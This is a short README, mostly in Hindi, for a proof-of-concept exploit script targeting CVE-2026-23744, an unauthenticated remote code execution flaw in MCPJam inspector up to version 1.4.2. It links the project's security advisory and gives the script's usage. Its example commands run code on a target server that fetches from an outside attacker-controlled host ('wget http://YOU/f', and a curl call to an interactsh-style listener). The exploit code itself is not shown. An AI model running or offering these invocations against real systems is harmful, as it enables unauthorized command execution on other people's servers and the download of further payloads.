
CVE-2026-23744 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो MCPJam इंस्पेक्टर <= 1.4.2 में एक अनप्रमाणित रिमोट कोड निष्पादन है, जो कमजोर लक्ष्यों पर कमांड निष्पादन की अनुमति देता है।
CVE-2026-23744
MCPJam inspector <= 1.4.2 में RCE
https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6
usage: mcpjaminspector-unauth-rce.py [-h] --target TARGET --command COMMAND
options:
-h, --help show this help message and exit
--target TARGET Target e.g https://127.0.0.1
--command COMMAND Command to exec on remote target. e.g: wget http://YOU/f
python3 mcpjaminspector-unauth-rce.py --target "http://mymcp.local/" --command "curl http://myinteractsh.local/test"